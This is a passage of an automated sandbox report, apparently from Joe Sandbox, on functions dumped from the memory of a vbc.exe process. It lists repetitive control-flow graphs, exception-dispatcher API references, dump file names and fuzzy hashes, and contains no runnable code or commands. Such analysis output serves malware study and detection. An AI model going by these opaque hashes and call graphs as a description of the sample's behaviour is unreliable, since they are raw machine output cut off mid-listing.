2355->2245 2356->2245 2357->2245 2358->2245 2359->2323 2360->2323 2361->2284 2362->2284 2363->2284 2364->2287 2365->2287 2366->2287 2367->2248 2368->2248 2369->2251 2370->2251 2371->2251 2372->2290 2373->2290 2374->2290 2375->2257 2376->2257 2377->2257 2378->2218 2379->2218 2380->2221 2381->2221 2382->2221 2383->2221 2384->2224 2385->2224 2386->2224 2387->2302 2388->2302 2389->2302 2390->2227 2391->2227 2392->2227 2393->2227 2394->2227 2395->2305 2396->2305 2397->2305 2398->2305 2399->2266 2400->2266 2401->2266 2402->2266 2403->2266 2404->2269 2405->2269 2406->2269 2407->2230 2408->2230 2409->2230 2410->2230 2411->2230 2412->2230 2413->2308 2414->2308 2415->2311 2416->2311 2417->2311 2418->2311 2419->2311 2420->2311 2421->2275 2422->2275 2423->2275 2424->2314 2425->2314 2426->2239 2427->2239
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 3ec3766bda92dd688adbebaea3487ebfd557d34213375ba8fcb4a1d93d7e412f
                                                              • Instruction ID: 6bdf08e5b9b81d55a1ca1b41c3740a6a0893c3fa75a21f364a611a22246e5eaf
                                                              • Opcode Fuzzy Hash: 3ec3766bda92dd688adbebaea3487ebfd557d34213375ba8fcb4a1d93d7e412f
                                                              • Instruction Fuzzy Hash: 7D02EB7490A298CFC766DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB359D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7AE4 Relevance: 3.3, APIs: 2, Instructions: 337COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2429 9ee7ae4-9ee7b08 call 9ee5a68 call 9ee5bf8 2640 9ee7b08 call a276008 2429->2640 2641 9ee7b08 call a276068 2429->2641 2435 9ee7b0e-9ee7b43 2642 9ee7b43 call a276dc4 2435->2642 2643 9ee7b43 call a276d70 2435->2643 2644 9ee7b43 call a276acc 2435->2644 2645 9ee7b43 call a276ad8 2435->2645 2438 9ee7b49-9ee7b75 2572 9ee7b75 call 4f0fc98 2438->2572 2573 9ee7b75 call 4f0fc88 2438->2573 2574 9ee7b75 call 4f0fcf9 2438->2574 2441 9ee7b7b-9ee7bb0 2578 9ee7bb0 call a3f07ee 2441->2578 2579 9ee7bb0 call a3f0006 2441->2579 2580 9ee7bb0 call a3f0be0 2441->2580 2581 9ee7bb0 call a3f0040 2441->2581 2582 9ee7bb0 call a3f0740 2441->2582 2444 9ee7bb6-9ee7bec 2595 9ee7bec call a3f07ee 2444->2595 2596 9ee7bec call a3f1038 2444->2596 2597 9ee7bec call a3f0006 2444->2597 2598 9ee7bec call a3f0be0 2444->2598 2599 9ee7bec call a3f0040 2444->2599 2600 9ee7bec call a3f0740 2444->2600 2447 9ee7bf2-9ee7cb2 2614 9ee7cb2 call a3f202e 2447->2614 2615 9ee7cb2 call a3f2090 2447->2615 2456 9ee7cb8-9ee7d33 2617 9ee7d33 call a3f3208 2456->2617 2618 9ee7d33 call a3f32a8 2456->2618 2619 9ee7d33 call a3f3158 2456->2619 2620 9ee7d33 call a3f3307 2456->2620 2462 9ee7d39-9ee7d78 2629 9ee7d78 call a3f3369 2462->2629 2630 9ee7d78 call a3f33c8 2462->2630 2465 9ee7d7e-9ee7dbd 2631 9ee7dbd call a3f39ff 2465->2631 2632 9ee7dbd call a3f3691 2465->2632 2633 9ee7dbd call a3f3900 2465->2633 2468 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 2637 9ee7e5d call a3f3ecf 2468->2637 2638 9ee7e5d call a3f3fdf 2468->2638 2639 9ee7e5d call a3f3f80 2468->2639 2474 9ee7e63-9ee7f2c 2587 9ee7f2c call a3f4279 2474->2587 2588 9ee7f2c call a3f4679 2474->2588 2589 9ee7f2c call a3f4288 2474->2589 2590 9ee7f2c call a3f4651 2474->2590 2591 9ee7f2c call a3f4320 2474->2591 2483 9ee7f32-9ee7f71 2592 9ee7f71 call a3f5ef8 2483->2592 2593 9ee7f71 call a3f5ee8 2483->2593 2594 9ee7f71 call a3f5f57 2483->2594 2486 9ee7f77-9ee7ffb 2609 9ee7ffb call a3f62ef 2486->2609 2610 9ee7ffb call a3f623c 2486->2610 2611 9ee7ffb call a3f6290 2486->2611 2492 9ee8001-9ee80c1 2623 9ee80c1 call a3f6be8 2492->2623 2624 9ee80c1 call a3f6d38 2492->2624 2625 9ee80c1 call a3f6d97 2492->2625 2501 9ee80c7-9ee8106 2626 9ee8106 call a3f6df9 2501->2626 2627 9ee8106 call a3f6e58 2501->2627 2628 9ee8106 call a3f6eb7 2501->2628 2504 9ee810c-9ee814b 2634 9ee814b call a3f6f18 2504->2634 2635 9ee814b call a3f6f78 2504->2635 2636 9ee814b call a3f6fd7 2504->2636 2507 9ee8151-9ee8268 2575 9ee8268 call a3f8149 2507->2575 2576 9ee8268 call a3f8158 2507->2576 2577 9ee8268 call a3f80b0 2507->2577 2519 9ee826e-9ee82b0 2583 9ee82b0 call a3f887f 2519->2583 2584 9ee82b0 call a3f83f8 2519->2584 2585 9ee82b0 call a3f85b8 2519->2585 2586 9ee82b0 call a3f8820 2519->2586 2522 9ee82b6-9ee82f8 2601 9ee82f8 call a3f88e0 2522->2601 2602 9ee82f8 call a3f8940 2522->2602 2525 9ee82fe-9ee8340 2603 9ee8340 call a3f8b7f 2525->2603 2604 9ee8340 call a3f8e1c 2525->2604 2605 9ee8340 call a3f8f18 2525->2605 2606 9ee8340 call a3f8f77 2525->2606 2607 9ee8340 call a3f88e0 2525->2607 2608 9ee8340 call a3f8940 2525->2608 2528 9ee8346-9ee8388 2612 9ee8388 call a3f9038 2528->2612 2613 9ee8388 call a3f9030 2528->2613 2531 9ee838e-9ee8454 call a3fa578 2621 9ee8454 call a3fba28 2531->2621 2622 9ee8454 call a3fb892 2531->2622 2540 9ee845a-9ee8730 KiUserExceptionDispatcher 2570 9ee8737-9ee876d 2540->2570 2572->2441 2573->2441 2574->2441 2575->2519 2576->2519 2577->2519 2578->2444 2579->2444 2580->2444 2581->2444 2582->2444 2583->2522 2584->2522 2585->2522 2586->2522 2587->2483 2588->2483 2589->2483 2590->2483 2591->2483 2592->2486 2593->2486 2594->2486 2595->2447 2596->2447 2597->2447 2598->2447 2599->2447 2600->2447 2601->2525 2602->2525 2603->2528 2604->2528 2605->2528 2606->2528 2607->2528 2608->2528 2609->2492 2610->2492 2611->2492 2612->2531 2613->2531 2614->2456 2615->2456 2617->2462 2618->2462 2619->2462 2620->2462 2621->2540 2622->2540 2623->2501 2624->2501 2625->2501 2626->2504 2627->2504 2628->2504 2629->2465 2630->2465 2631->2468 2632->2468 2633->2468 2634->2507 2635->2507 2636->2507 2637->2474 2638->2474 2639->2474 2640->2435 2641->2435 2642->2438 2643->2438 2644->2438 2645->2438
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 83611b2097d38c24e7b7715de063125bd1f38b23664494f76ee19e3837be50e3
                                                              • Instruction ID: de8765c772564149620995e55a5a0b8d5059c62dea74bb5a4427c53876de60be
                                                              • Opcode Fuzzy Hash: 83611b2097d38c24e7b7715de063125bd1f38b23664494f76ee19e3837be50e3
                                                              • Instruction Fuzzy Hash: FE02DB7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7B1F Relevance: 3.3, APIs: 2, Instructions: 331COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2646 9ee7b1f-9ee7b43 call 9ee5a68 call 9ee5bf8 2823 9ee7b43 call a276dc4 2646->2823 2824 9ee7b43 call a276d70 2646->2824 2825 9ee7b43 call a276acc 2646->2825 2826 9ee7b43 call a276ad8 2646->2826 2652 9ee7b49-9ee7b75 2827 9ee7b75 call 4f0fc98 2652->2827 2828 9ee7b75 call 4f0fc88 2652->2828 2829 9ee7b75 call 4f0fcf9 2652->2829 2655 9ee7b7b-9ee7bb0 2838 9ee7bb0 call a3f07ee 2655->2838 2839 9ee7bb0 call a3f0006 2655->2839 2840 9ee7bb0 call a3f0be0 2655->2840 2841 9ee7bb0 call a3f0040 2655->2841 2842 9ee7bb0 call a3f0740 2655->2842 2658 9ee7bb6-9ee7bec 2847 9ee7bec call a3f07ee 2658->2847 2848 9ee7bec call a3f1038 2658->2848 2849 9ee7bec call a3f0006 2658->2849 2850 9ee7bec call a3f0be0 2658->2850 2851 9ee7bec call a3f0040 2658->2851 2852 9ee7bec call a3f0740 2658->2852 2661 9ee7bf2-9ee7cb2 2797 9ee7cb2 call a3f202e 2661->2797 2798 9ee7cb2 call a3f2090 2661->2798 2670 9ee7cb8-9ee7d33 2803 9ee7d33 call a3f3208 2670->2803 2804 9ee7d33 call a3f32a8 2670->2804 2805 9ee7d33 call a3f3158 2670->2805 2806 9ee7d33 call a3f3307 2670->2806 2676 9ee7d39-9ee7d78 2809 9ee7d78 call a3f3369 2676->2809 2810 9ee7d78 call a3f33c8 2676->2810 2679 9ee7d7e-9ee7dbd 2817 9ee7dbd call a3f39ff 2679->2817 2818 9ee7dbd call a3f3691 2679->2818 2819 9ee7dbd call a3f3900 2679->2819 2682 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 2820 9ee7e5d call a3f3ecf 2682->2820 2821 9ee7e5d call a3f3fdf 2682->2821 2822 9ee7e5d call a3f3f80 2682->2822 2688 9ee7e63-9ee7f2c 2833 9ee7f2c call a3f4279 2688->2833 2834 9ee7f2c call a3f4679 2688->2834 2835 9ee7f2c call a3f4288 2688->2835 2836 9ee7f2c call a3f4651 2688->2836 2837 9ee7f2c call a3f4320 2688->2837 2697 9ee7f32-9ee7f71 2855 9ee7f71 call a3f5ef8 2697->2855 2856 9ee7f71 call a3f5ee8 2697->2856 2857 9ee7f71 call a3f5f57 2697->2857 2700 9ee7f77-9ee7ffb 2794 9ee7ffb call a3f62ef 2700->2794 2795 9ee7ffb call a3f623c 2700->2795 2796 9ee7ffb call a3f6290 2700->2796 2706 9ee8001-9ee80c1 2800 9ee80c1 call a3f6be8 2706->2800 2801 9ee80c1 call a3f6d38 2706->2801 2802 9ee80c1 call a3f6d97 2706->2802 2715 9ee80c7-9ee8106 2811 9ee8106 call a3f6df9 2715->2811 2812 9ee8106 call a3f6e58 2715->2812 2813 9ee8106 call a3f6eb7 2715->2813 2718 9ee810c-9ee814b 2814 9ee814b call a3f6f18 2718->2814 2815 9ee814b call a3f6f78 2718->2815 2816 9ee814b call a3f6fd7 2718->2816 2721 9ee8151-9ee8268 2830 9ee8268 call a3f8149 2721->2830 2831 9ee8268 call a3f8158 2721->2831 2832 9ee8268 call a3f80b0 2721->2832 2733 9ee826e-9ee82b0 2843 9ee82b0 call a3f887f 2733->2843 2844 9ee82b0 call a3f83f8 2733->2844 2845 9ee82b0 call a3f85b8 2733->2845 2846 9ee82b0 call a3f8820 2733->2846 2736 9ee82b6-9ee82f8 2853 9ee82f8 call a3f88e0 2736->2853 2854 9ee82f8 call a3f8940 2736->2854 2739 9ee82fe-9ee8340 2786 9ee8340 call a3f8b7f 2739->2786 2787 9ee8340 call a3f8e1c 2739->2787 2788 9ee8340 call a3f8f18 2739->2788 2789 9ee8340 call a3f8f77 2739->2789 2790 9ee8340 call a3f88e0 2739->2790 2791 9ee8340 call a3f8940 2739->2791 2742 9ee8346-9ee8388 2792 9ee8388 call a3f9038 2742->2792 2793 9ee8388 call a3f9030 2742->2793 2745 9ee838e-9ee8454 call a3fa578 2807 9ee8454 call a3fba28 2745->2807 2808 9ee8454 call a3fb892 2745->2808 2754 9ee845a-9ee8730 KiUserExceptionDispatcher 2784 9ee8737-9ee876d 2754->2784 2786->2742 2787->2742 2788->2742 2789->2742 2790->2742 2791->2742 2792->2745 2793->2745 2794->2706 2795->2706 2796->2706 2797->2670 2798->2670 2800->2715 2801->2715 2802->2715 2803->2676 2804->2676 2805->2676 2806->2676 2807->2754 2808->2754 2809->2679 2810->2679 2811->2718 2812->2718 2813->2718 2814->2721 2815->2721 2816->2721 2817->2682 2818->2682 2819->2682 2820->2688 2821->2688 2822->2688 2823->2652 2824->2652 2825->2652 2826->2652 2827->2655 2828->2655 2829->2655 2830->2733 2831->2733 2832->2733 2833->2697 2834->2697 2835->2697 2836->2697 2837->2697 2838->2658 2839->2658 2840->2658 2841->2658 2842->2658 2843->2736 2844->2736 2845->2736 2846->2736 2847->2661 2848->2661 2849->2661 2850->2661 2851->2661 2852->2661 2853->2739 2854->2739 2855->2700 2856->2700 2857->2700
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 7b6d9ec72fc5bd737eaa2a317d7f970171371f860dc65be987106c8764d0cdc8
                                                              • Instruction ID: 13d37a1d78f12a37a87d323651cda23b8131bc4216b4dd92f0a9fd9ce3a0639e
                                                              • Opcode Fuzzy Hash: 7b6d9ec72fc5bd737eaa2a317d7f970171371f860dc65be987106c8764d0cdc8
                                                              • Instruction Fuzzy Hash: 4302DB7490A298CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7B5A Relevance: 3.3, APIs: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2858 9ee7b5a-9ee7b75 call 9ee5a68 call 9ee5bf8 3018 9ee7b75 call 4f0fc98 2858->3018 3019 9ee7b75 call 4f0fc88 2858->3019 3020 9ee7b75 call 4f0fcf9 2858->3020 2864 9ee7b7b-9ee7bb0 3029 9ee7bb0 call a3f07ee 2864->3029 3030 9ee7bb0 call a3f0006 2864->3030 3031 9ee7bb0 call a3f0be0 2864->3031 3032 9ee7bb0 call a3f0040 2864->3032 3033 9ee7bb0 call a3f0740 2864->3033 2867 9ee7bb6-9ee7bec 3038 9ee7bec call a3f07ee 2867->3038 3039 9ee7bec call a3f1038 2867->3039 3040 9ee7bec call a3f0006 2867->3040 3041 9ee7bec call a3f0be0 2867->3041 3042 9ee7bec call a3f0040 2867->3042 3043 9ee7bec call a3f0740 2867->3043 2870 9ee7bf2-9ee7cb2 3060 9ee7cb2 call a3f202e 2870->3060 3061 9ee7cb2 call a3f2090 2870->3061 2879 9ee7cb8-9ee7d33 2998 9ee7d33 call a3f3208 2879->2998 2999 9ee7d33 call a3f32a8 2879->2999 3000 9ee7d33 call a3f3158 2879->3000 3001 9ee7d33 call a3f3307 2879->3001 2885 9ee7d39-9ee7d78 3004 9ee7d78 call a3f3369 2885->3004 3005 9ee7d78 call a3f33c8 2885->3005 2888 9ee7d7e-9ee7dbd 3012 9ee7dbd call a3f39ff 2888->3012 3013 9ee7dbd call a3f3691 2888->3013 3014 9ee7dbd call a3f3900 2888->3014 2891 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 3015 9ee7e5d call a3f3ecf 2891->3015 3016 9ee7e5d call a3f3fdf 2891->3016 3017 9ee7e5d call a3f3f80 2891->3017 2897 9ee7e63-9ee7f2c 3024 9ee7f2c call a3f4279 2897->3024 3025 9ee7f2c call a3f4679 2897->3025 3026 9ee7f2c call a3f4288 2897->3026 3027 9ee7f2c call a3f4651 2897->3027 3028 9ee7f2c call a3f4320 2897->3028 2906 9ee7f32-9ee7f71 3046 9ee7f71 call a3f5ef8 2906->3046 3047 9ee7f71 call a3f5ee8 2906->3047 3048 9ee7f71 call a3f5f57 2906->3048 2909 9ee7f77-9ee7ffb 3057 9ee7ffb call a3f62ef 2909->3057 3058 9ee7ffb call a3f623c 2909->3058 3059 9ee7ffb call a3f6290 2909->3059 2915 9ee8001-9ee80c1 2995 9ee80c1 call a3f6be8 2915->2995 2996 9ee80c1 call a3f6d38 2915->2996 2997 9ee80c1 call a3f6d97 2915->2997 2924 9ee80c7-9ee8106 3006 9ee8106 call a3f6df9 2924->3006 3007 9ee8106 call a3f6e58 2924->3007 3008 9ee8106 call a3f6eb7 2924->3008 2927 9ee810c-9ee814b 3009 9ee814b call a3f6f18 2927->3009 3010 9ee814b call a3f6f78 2927->3010 3011 9ee814b call a3f6fd7 2927->3011 2930 9ee8151-9ee8268 3021 9ee8268 call a3f8149 2930->3021 3022 9ee8268 call a3f8158 2930->3022 3023 9ee8268 call a3f80b0 2930->3023 2942 9ee826e-9ee82b0 3034 9ee82b0 call a3f887f 2942->3034 3035 9ee82b0 call a3f83f8 2942->3035 3036 9ee82b0 call a3f85b8 2942->3036 3037 9ee82b0 call a3f8820 2942->3037 2945 9ee82b6-9ee82f8 3044 9ee82f8 call a3f88e0 2945->3044 3045 9ee82f8 call a3f8940 2945->3045 2948 9ee82fe-9ee8340 3049 9ee8340 call a3f8b7f 2948->3049 3050 9ee8340 call a3f8e1c 2948->3050 3051 9ee8340 call a3f8f18 2948->3051 3052 9ee8340 call a3f8f77 2948->3052 3053 9ee8340 call a3f88e0 2948->3053 3054 9ee8340 call a3f8940 2948->3054 2951 9ee8346-9ee8388 3055 9ee8388 call a3f9038 2951->3055 3056 9ee8388 call a3f9030 2951->3056 2954 9ee838e-9ee8454 call a3fa578 3002 9ee8454 call a3fba28 2954->3002 3003 9ee8454 call a3fb892 2954->3003 2963 9ee845a-9ee8730 KiUserExceptionDispatcher 2993 9ee8737-9ee876d 2963->2993 2995->2924 2996->2924 2997->2924 2998->2885 2999->2885 3000->2885 3001->2885 3002->2963 3003->2963 3004->2888 3005->2888 3006->2927 3007->2927 3008->2927 3009->2930 3010->2930 3011->2930 3012->2891 3013->2891 3014->2891 3015->2897 3016->2897 3017->2897 3018->2864 3019->2864 3020->2864 3021->2942 3022->2942 3023->2942 3024->2906 3025->2906 3026->2906 3027->2906 3028->2906 3029->2867 3030->2867 3031->2867 3032->2867 3033->2867 3034->2945 3035->2945 3036->2945 3037->2945 3038->2870 3039->2870 3040->2870 3041->2870 3042->2870 3043->2870 3044->2948 3045->2948 3046->2909 3047->2909 3048->2909 3049->2951 3050->2951 3051->2951 3052->2951 3053->2951 3054->2951 3055->2954 3056->2954 3057->2915 3058->2915 3059->2915 3060->2879 3061->2879
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 57abb7080ba08ae490db0a82a522d1c044ab899b3411815b64c317c8f6ba7bf6
                                                              • Instruction ID: 43d5a42c07a834367abdaa4fa732016b3234e41cf225eacf863b4fecea0a8432
                                                              • Opcode Fuzzy Hash: 57abb7080ba08ae490db0a82a522d1c044ab899b3411815b64c317c8f6ba7bf6
                                                              • Instruction Fuzzy Hash: C3F1EC7490A398CFCB66DF74E8886A9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7B8C Relevance: 3.3, APIs: 2, Instructions: 319COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3063 9ee7b8c-9ee7bb0 call 9ee5a68 call 9ee5bf8 3214 9ee7bb0 call a3f07ee 3063->3214 3215 9ee7bb0 call a3f0006 3063->3215 3216 9ee7bb0 call a3f0be0 3063->3216 3217 9ee7bb0 call a3f0040 3063->3217 3218 9ee7bb0 call a3f0740 3063->3218 3069 9ee7bb6-9ee7bec 3231 9ee7bec call a3f07ee 3069->3231 3232 9ee7bec call a3f1038 3069->3232 3233 9ee7bec call a3f0006 3069->3233 3234 9ee7bec call a3f0be0 3069->3234 3235 9ee7bec call a3f0040 3069->3235 3236 9ee7bec call a3f0740 3069->3236 3072 9ee7bf2-9ee7cb2 3250 9ee7cb2 call a3f202e 3072->3250 3251 9ee7cb2 call a3f2090 3072->3251 3081 9ee7cb8-9ee7d33 3253 9ee7d33 call a3f3208 3081->3253 3254 9ee7d33 call a3f32a8 3081->3254 3255 9ee7d33 call a3f3158 3081->3255 3256 9ee7d33 call a3f3307 3081->3256 3087 9ee7d39-9ee7d78 3200 9ee7d78 call a3f3369 3087->3200 3201 9ee7d78 call a3f33c8 3087->3201 3090 9ee7d7e-9ee7dbd 3202 9ee7dbd call a3f39ff 3090->3202 3203 9ee7dbd call a3f3691 3090->3203 3204 9ee7dbd call a3f3900 3090->3204 3093 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 3208 9ee7e5d call a3f3ecf 3093->3208 3209 9ee7e5d call a3f3fdf 3093->3209 3210 9ee7e5d call a3f3f80 3093->3210 3099 9ee7e63-9ee7f2c 3223 9ee7f2c call a3f4279 3099->3223 3224 9ee7f2c call a3f4679 3099->3224 3225 9ee7f2c call a3f4288 3099->3225 3226 9ee7f2c call a3f4651 3099->3226 3227 9ee7f2c call a3f4320 3099->3227 3108 9ee7f32-9ee7f71 3228 9ee7f71 call a3f5ef8 3108->3228 3229 9ee7f71 call a3f5ee8 3108->3229 3230 9ee7f71 call a3f5f57 3108->3230 3111 9ee7f77-9ee7ffb 3245 9ee7ffb call a3f62ef 3111->3245 3246 9ee7ffb call a3f623c 3111->3246 3247 9ee7ffb call a3f6290 3111->3247 3117 9ee8001-9ee80c1 3259 9ee80c1 call a3f6be8 3117->3259 3260 9ee80c1 call a3f6d38 3117->3260 3261 9ee80c1 call a3f6d97 3117->3261 3126 9ee80c7-9ee8106 3197 9ee8106 call a3f6df9 3126->3197 3198 9ee8106 call a3f6e58 3126->3198 3199 9ee8106 call a3f6eb7 3126->3199 3129 9ee810c-9ee814b 3205 9ee814b call a3f6f18 3129->3205 3206 9ee814b call a3f6f78 3129->3206 3207 9ee814b call a3f6fd7 3129->3207 3132 9ee8151-9ee8268 3211 9ee8268 call a3f8149 3132->3211 3212 9ee8268 call a3f8158 3132->3212 3213 9ee8268 call a3f80b0 3132->3213 3144 9ee826e-9ee82b0 3219 9ee82b0 call a3f887f 3144->3219 3220 9ee82b0 call a3f83f8 3144->3220 3221 9ee82b0 call a3f85b8 3144->3221 3222 9ee82b0 call a3f8820 3144->3222 3147 9ee82b6-9ee82f8 3237 9ee82f8 call a3f88e0 3147->3237 3238 9ee82f8 call a3f8940 3147->3238 3150 9ee82fe-9ee8340 3239 9ee8340 call a3f8b7f 3150->3239 3240 9ee8340 call a3f8e1c 3150->3240 3241 9ee8340 call a3f8f18 3150->3241 3242 9ee8340 call a3f8f77 3150->3242 3243 9ee8340 call a3f88e0 3150->3243 3244 9ee8340 call a3f8940 3150->3244 3153 9ee8346-9ee8388 3248 9ee8388 call a3f9038 3153->3248 3249 9ee8388 call a3f9030 3153->3249 3156 9ee838e-9ee8454 call a3fa578 3257 9ee8454 call a3fba28 3156->3257 3258 9ee8454 call a3fb892 3156->3258 3165 9ee845a-9ee8730 KiUserExceptionDispatcher 3195 9ee8737-9ee876d 3165->3195 3197->3129 3198->3129 3199->3129 3200->3090 3201->3090 3202->3093 3203->3093 3204->3093 3205->3132 3206->3132 3207->3132 3208->3099 3209->3099 3210->3099 3211->3144 3212->3144 3213->3144 3214->3069 3215->3069 3216->3069 3217->3069 3218->3069 3219->3147 3220->3147 3221->3147 3222->3147 3223->3108 3224->3108 3225->3108 3226->3108 3227->3108 3228->3111 3229->3111 3230->3111 3231->3072 3232->3072 3233->3072 3234->3072 3235->3072 3236->3072 3237->3150 3238->3150 3239->3153 3240->3153 3241->3153 3242->3153 3243->3153 3244->3153 3245->3117 3246->3117 3247->3117 3248->3156 3249->3156 3250->3081 3251->3081 3253->3087 3254->3087 3255->3087 3256->3087 3257->3165 3258->3165 3259->3126 3260->3126 3261->3126
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE7E02
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 980a1a7af583437ec513b6befdbefaa9f151750386651c71bee7b6bafaa67e69
                                                              • Instruction ID: 01026b29269873fa8b99adade37087c59fd418ccec2447d1a7ef830f1a58ddae
                                                              • Opcode Fuzzy Hash: 980a1a7af583437ec513b6befdbefaa9f151750386651c71bee7b6bafaa67e69
                                                              • Instruction Fuzzy Hash: 07F1EC7490A298CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB355D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE7BD1 Relevance: 3.3, APIs: 2, Instructions: 310COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3262 9ee7bd1-9ee7bec call 9ee5a68 call 9ee5bf8 3432 9ee7bec call a3f07ee 3262->3432 3433 9ee7bec call a3f1038 3262->3433 3434 9ee7bec call a3f0006 3262->3434 3435 9ee7bec call a3f0be0 3262->3435 3436 9ee7bec call a3f0040 3262->3436 3437 9ee7bec call a3f0740 3262->3437 3268 9ee7bf2-9ee7cb2 3451 9ee7cb2 call a3f202e 3268->3451 3452 9ee7cb2 call a3f2090 3268->3452 3277 9ee7cb8-9ee7d33 3394 9ee7d33 call a3f3208 3277->3394 3395 9ee7d33 call a3f32a8 3277->3395 3396 9ee7d33 call a3f3158 3277->3396 3397 9ee7d33 call a3f3307 3277->3397 3283 9ee7d39-9ee7d78 3406 9ee7d78 call a3f3369 3283->3406 3407 9ee7d78 call a3f33c8 3283->3407 3286 9ee7d7e-9ee7dbd 3408 9ee7dbd call a3f39ff 3286->3408 3409 9ee7dbd call a3f3691 3286->3409 3410 9ee7dbd call a3f3900 3286->3410 3289 9ee7dc3-9ee7e5d KiUserExceptionDispatcher 3414 9ee7e5d call a3f3ecf 3289->3414 3415 9ee7e5d call a3f3fdf 3289->3415 3416 9ee7e5d call a3f3f80 3289->3416 3295 9ee7e63-9ee7f2c 3424 9ee7f2c call a3f4279 3295->3424 3425 9ee7f2c call a3f4679 3295->3425 3426 9ee7f2c call a3f4288 3295->3426 3427 9ee7f2c call a3f4651 3295->3427 3428 9ee7f2c call a3f4320 3295->3428 3304 9ee7f32-9ee7f71 3429 9ee7f71 call a3f5ef8 3304->3429 3430 9ee7f71 call a3f5ee8 3304->3430 3431 9ee7f71 call a3f5f57 3304->3431 3307 9ee7f77-9ee7ffb 3446 9ee7ffb call a3f62ef 3307->3446 3447 9ee7ffb call a3f623c 3307->3447 3448 9ee7ffb call a3f6290 3307->3448 3313 9ee8001-9ee80c1 3400 9ee80c1 call a3f6be8 3313->3400 3401 9ee80c1 call a3f6d38 3313->3401 3402 9ee80c1 call a3f6d97 3313->3402 3322 9ee80c7-9ee8106 3403 9ee8106 call a3f6df9 3322->3403 3404 9ee8106 call a3f6e58 3322->3404 3405 9ee8106 call a3f6eb7 3322->3405 3325 9ee810c-9ee814b 3411 9ee814b call a3f6f18 3325->3411 3412 9ee814b call a3f6f78 3325->3412 3413 9ee814b call a3f6fd7 3325->3413 3328 9ee8151-9ee8268 3417 9ee8268 call a3f8149 3328->3417 3418 9ee8268 call a3f8158 3328->3418 3419 9ee8268 call a3f80b0 3328->3419 3340 9ee826e-9ee82b0 3420 9ee82b0 call a3f887f 3340->3420 3421 9ee82b0 call a3f83f8 3340->3421 3422 9ee82b0 call a3f85b8 3340->3422 3423 9ee82b0 call a3f8820 3340->3423 3343 9ee82b6-9ee82f8 3438 9ee82f8 call a3f88e0 3343->3438 3439 9ee82f8 call a3f8940 3343->3439 3346 9ee82fe-9ee8340 3440 9ee8340 call a3f8b7f 3346->3440 3441 9ee8340 call a3f8e1c 3346->3441 3442 